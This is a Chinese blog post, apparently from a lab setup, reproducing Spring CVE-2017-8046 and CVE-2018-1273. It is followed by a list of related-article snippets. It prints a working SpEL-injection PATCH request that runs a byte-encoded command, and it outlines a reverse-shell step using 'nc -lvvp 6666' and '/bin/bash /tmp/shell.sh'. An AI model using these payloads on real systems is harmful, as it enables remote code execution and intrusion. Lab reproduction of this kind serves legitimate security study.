Spring漏洞再现

已于 2025-03-24 21:23:28 修改
阅读量134 收藏 4
点赞数 5
文章标签: spring java 后端
于 2025-03-24 18:58:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_64470109/article/details/146483184
版权

一、CVE-2017-8046

1、开环境

2、访问目录

/customers/1

3、在当前页抓包,并修改数据包

PATCH /customers/1 HTTP/1.1
Host: 150.158.199.164:8080
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 200

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,101}))/lastname", "value": "vulhub" }]

4、进入容器,查看命令是否执行

查看容器id:docker ps

进入容器:docker exec -it 容器的id /bin/base

输入命令ls /tmp

二、CVE-2018-1273

1、开环境

2、访问目录

/users

3、抓包

填写注册信息,抓包

修改信息

4、进入容器执行命令

5、反弹shell

在服务器写一个shell文件

让靶机执行脚本

开启监听,并执行脚本

开启监听:nc -lvvp 6666

执行脚本:/bin/bash /tmp/shell.sh

成功监听

JVM 问题排查分析上篇(调优经验)
KimmKing的技术博客
09-22 695
一般来说,只要系统架构设计得比较合理,大部分情况下系统都能正常运行,出现系统崩溃等故障问题是小概率事件。也就是说,业务开发是大部分软件工程中的重头戏,所以有人开玩笑说:“面试造火箭,入职拧螺丝。” 一般来说,我们进行排查分析的目的主要有: 解决问题和故障 排查系统风险隐患 我们按照问题的复杂程度,可以分为两类: 常规问题 疑难杂症 常规的问题一般在开发过程中就被发现和解决了,所以线上问题一...
记一次由gzip引起的nginx转发事故
极客中年的博客
03-28 1325
一个gzip引发的案件,原因是因为过waf的时候,waf会自动引入gzip压缩处理,导致前置应用没有处理,解决此问题的方案有2。
WebLogic漏洞再现
qq_64470109的博客
03-23 779
请求包中的150.158.199.164/1.txt代表着把我们网站的根目录下的1.txt上传到他的电脑上,并重命名为wjf.jsp。域结构——base-domain——高级——启动WEB服务测试页——保存。改为POST传参,修改文件类型为text/xml,添加请求包。改为POST传参,文件类型改为text/xml,添加请求包。f12,点左边的小箭头,再点上面的1,就可以显示出来id。环境就是上一个的环境不用变,访问目录即可。在我们的服务器新建一个xml文件。还是上一个的环境,需要访问目录。
Spring5学习JdbcTemplate时遇到的问题
xk1835217729的博客
03-06 824
今天在学习Spring5的JdbcTemplate部分时,做前期准备的过程中遇到一个坑,记录一下 情景再现 首先,导入好JdbcTemplate所需要的jar包 然后,在Spring配置文件中配置好数据库连接池和创建JdbcTemplate对象 <?xml version="1.0" encoding="UTF-8"?> <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://w
Netflix Spring Boot应用内存泄漏致宕机,Java如何用“静态+动态分析“48小时定位漏洞
墨夶的博客
04-18 256
你的漏洞像’地雷’:‘需要自动检测并发问题!“你的代码像’野草’:‘需要统一的编码规范!“你的规则像’模板’:‘需要自定义语法分析!“你的内存像’漏斗’:‘需要精准定位泄漏点!“你的依赖像’俄罗斯套娃’:‘需要版本控制!“你的监控像’盲人摸象’:‘需要全链路追踪!“你的JVM像’黑匣子’:‘需要实时监控!“你的方法像’黑箱’:‘需要响应时间监控!“你的线程像’交通堵塞’:‘需要并发优化!“你的死锁像’死循环’:‘需要强制分析!“你的异常像’谜题’:‘需要智能分类!“你的流程像’手工活’:‘需要自动化!
CVE-2022-22965 漏洞复现学习
守拙的博客
04-30 3295
漏洞利用条件 JDK 9+ Spring 及其衍生框架 使用Tomcat部署spring项目 使用了POJO参数绑定 Spring Framework 5.3.X < 5.3.18 、2.X < 5.2.20 或者其他版本 环境搭建 Java 靶场 JDK 11(必须9及9以上) Tomcat 8 首先需要个实体类 sdf sdf public class HelloWorld { private String message; public String getM
经典再现,看到就是赚到。尚硅谷雷神 - SpringBoot 2.x 学习笔记 -高级与场景整合篇
laizhenghua的博客
04-12 2157
SpringBoot 2.x 场景整合 在上一篇核心功能篇里,我们已了解SpringBoot的配置文件、web开发、数据访问、JUnit5单元测试、生产指标监控、SpringBoot启动流程等。然而SpringBoot是一个伟大的框架,它的知识点远不止这些,我们还要学习更多的技术并整合到SpringBoot中,如虚拟化技术、安全控制、缓存技术、消息中间件、对象存储、定时调度、异步任务、分布式系统等,才能迎接微服务时代! 整合示例:https://github.com/spring-projects/spri
JNDI RMI 注入(Log4j2漏洞
热门推荐
sun0322
12-24 1万+
目录 ■相关知识 1.SLF4J(Simple logging Facade for Java) // 简单日志门面 ■(log4j2)漏洞 ■JNDI 注入代码实现(RMI) ■代码细节说明 1.javax.naming.Reference // 构造方法 2.代码中使用的服务如何构建 SimpleHTTPServer // (Python)快速共享目录 3.RMI的利用版本限制 4.问答 5.RMI(Remote Method Invocation)为远程方法调用 ●在攻击..
6.SpringCloud -- 注册中心与配置中心 Nacos、网关 Gateway
爱是与世界平行
09-10 7417
6.SpringCloud -- 注册中心与配置中心 Nacos、网关 Gateway一、了解一下 SpringCloud Alibaba1.1 SpringCloudAlibaba(1)简单说明(2)SpringCloudAlibaba(3)引入依赖1.2 SpringCloudAlibaba 主要功能 与 实现组件(1)SpringCloudAlibaba 主要功能 与 实现组件(2)开发中常使用的技术搭配二、服务注册中心、配置中心 -- Nacos2.1 什么是 Nacos?(1)Nacos(2)如何
SpringBoot处理CORS问题
MR_Peach07的博客
11-10 2642
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
漏洞复现(包含近几年CVE)『持续更新中』
Zyu0
11-26 1267
FTP服务端请求伪造漏洞(SSRF)Spring Boot服务端模板注入(SSTI)漏洞XML外部实体(XXE)注入漏洞获取root私钥ipython 8.0.0 远程命令执行漏洞(CVE-2022-21699)Exiftool远程代码执行漏洞(CVE-2021-22204)ImageMagrick命令执行漏洞(CVE-2020-29599)Cachet配置泄露漏洞利用(CVE-2021-39174)Linux系统内核漏洞(CVE-2022-2588)mpdf 代码注入漏洞
刚刚公布的 Log4J 的史诗级安全漏洞 CVE-2021-44228 你处理了吗?
weixin_45987961的博客
12-15 5497
发生什么事了 Log4J 是一个应用非常广泛的Java库,就在前两天的2021年12月10日,Log4J的一个安全漏洞被公布了。那天正好是周五,很多程序员都在计划着怎么度过一个愉快的周末,不料这个安全漏洞的公开,使得全世界很多程序员不得不周末加班,有的甚至通宵达旦紧急应对。 漏洞编号为CVE-2021-44228 ,攻击者利用这个新的零日漏洞,可以远程执行恶意代码。 零日漏洞( zero-day )通常是指还没有补丁的安全漏洞。零日漏洞利用(zero-day exploit)的程序对网络安全具有..
红队专题-漏洞挖掘-代码审计-反序列化
aming小老弟
04-21 1869
TransformedMap⽤于对Java标准数据结构Map做⼀个修饰,被修饰过的Map在添加新的元素时,将可以执⾏⼀个回调。super(map);
SpringBoot与SpringCloud场景题深度解析
最新发布
南客先生的博客
04-29 289
本场面试主要围绕SpringBoot和SpringCloud项目中的应用场景展开,包括SpringBoot的自动配置、SpringCloud的服务注册与发现以及分布式系统中的容错处理等问题。通过深入探讨和多种解决方案的对比,展示了候选人在实际生产环境中解决问题的能力。希望本文能帮助广大Java求职者更好地应对面试挑战。
SpringBoot UserAgentUtils获取用户浏览器 操作系统设备统计 信息统计 日志入库
生产队的驴
04-27 473
UserAgentUtils 是于处理用户代理(User-Agent)字符串的工具类,一般用于解析和处理浏览器、操作系统以及设备等相关信息,这些信息通常包含在接口请求的 User-Agent 字符串中。这个库可以用于解析用户代理头,以提取有关所使用的浏览器、浏览器版本、平台、平台版本和设备类型的信息。对于确定客户端是否是台式机、平板电脑或移动设备,或者客户端是否在Windows或Mac OS上(仅举几例)非常有用。超过150种不同的浏览器;7种不同的浏览器类型;超过60种不同的操作系统;
Spring MVC 基础 - 从零构建企业级Web应用
weixin_46619605的博客
04-28 1128
Spring MVC 基础 - 从零构建企业级Web应用
springboot不连接数据库启动(原先连接了mysql数据库)
uncofish的博客
04-27 279
配置application.properties。配置H2内存数据库(无需真实数据库)
springspring boot, spring cloud三者区别
帅帅的廉颇的博客
04-23 1181
Spring(基础) → Spring Boot(快速开发) → Spring Cloud(分布式扩展)
Springoot、Flowable快速学习
qq_39035267的博客
04-25 563
Springoot、Flowable快速学习,你想象不到实现起来如此的简单
500: {"errors":[{"code":"INTERNAL_ERROR","message":"internal error"}]}
02-07
对于Java EE平台而言,除了标准输出外还应关注特定框架的日志输出路径,比如Spring Boot默认会在控制台打印堆栈跟踪信息的同时也支持通过`logging.file.name`属性指定单独的日志文件保存地址[^4]。 #### 验证环境...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值